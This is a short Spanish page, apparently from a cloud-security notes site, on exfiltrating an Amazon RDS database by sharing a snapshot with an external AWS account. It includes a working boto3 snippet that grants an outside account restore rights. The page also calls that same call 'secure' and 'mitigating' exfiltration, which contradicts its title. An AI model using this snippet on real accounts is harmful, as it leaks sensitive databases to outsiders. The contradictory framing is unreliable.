Exfiltracion de un RDS por medio de un snapshot

La exfiltración de un snapshot de Amazon RDS mediante su compartición implica otorgar acceso a una copia de seguridad de la base de datos a una cuenta externa de AWS. Al compartir el snapshot, la cuenta receptora obtiene la capacidad de restaurarlo, accediendo así a los datos contenidos en la base de datos. Este proceso, si no se maneja adecuadamente, puede representar un vector de ataque que permita a actores no autorizados acceder a información sensible.

import boto3

# Crear un cliente de RDS
rds_client = boto3.client('rds')

# Definir el identificador del snapshot
snapshot_identifier = 'my-db-snapshot'

# Definir el ID de la cuenta AWS con la que compartir
account_id = '012345678901'

# Compartir el snapshot de RDS con la cuenta AWS externa de manera segura
rds_client.modify_db_snapshot_attribute(
    DBSnapshotIdentifier=snapshot_identifier,
    AttributeName='restore',
    ValuesToAdd=[account_id]
)

Asegúrate de reemplazar 'my-db-snapshot' por el identificador real de tu snapshot y '012345678901' por el ID de la cuenta AWS con la que deseas compartir el snapshot. Este código se asegura de que el snapshot solo sea compartido con la cuenta especificada, mitigando el riesgo de exfiltración de datos por actores no autorizados.

Última actualización

¿Te fue útil?